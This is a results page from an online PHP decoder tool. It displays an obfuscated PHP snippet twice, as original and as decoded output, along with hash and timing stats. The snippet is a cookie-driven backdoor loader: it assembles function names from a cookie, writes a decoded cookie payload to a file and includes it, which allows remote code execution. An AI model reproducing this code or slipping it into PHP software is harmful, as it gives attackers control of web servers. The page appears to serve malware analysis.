Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$c=$_COOKIE;$k=0;$n=6;$p=array();$p[$k]='';while($n){$p[$k].=$c[35][$n];if(!$c[35][$n+1]){..
Decoded Output download
<? $c=$_COOKIE;$k=0;$n=6;$p=array();$p[$k]='';while($n){$p[$k].=$c[35][$n];if(!$c[35][$n+1]){if(!$c[35][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+6+1;}$k=$p[15]().$p[16];if(!$p[22]($k)){$n=$p[21]($k,$p[14]);$p[23]($n,$p[27].$p[11]($p[0]($c[3])));}include($k); ?>
Did this file decode correctly?
Original Code
$c=$_COOKIE;$k=0;$n=6;$p=array();$p[$k]='';while($n){$p[$k].=$c[35][$n];if(!$c[35][$n+1]){if(!$c[35][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+6+1;}$k=$p[15]().$p[16];if(!$p[22]($k)){$n=$p[21]($k,$p[14]);$p[23]($n,$p[27].$p[11]($p[0]($c[3])));}include($k);
Function Calls
None |
Stats
MD5 | 40e88c930c7ffdcf536b642af8c75ffb |
Eval Count | 0 |
Decode Time | 56 ms |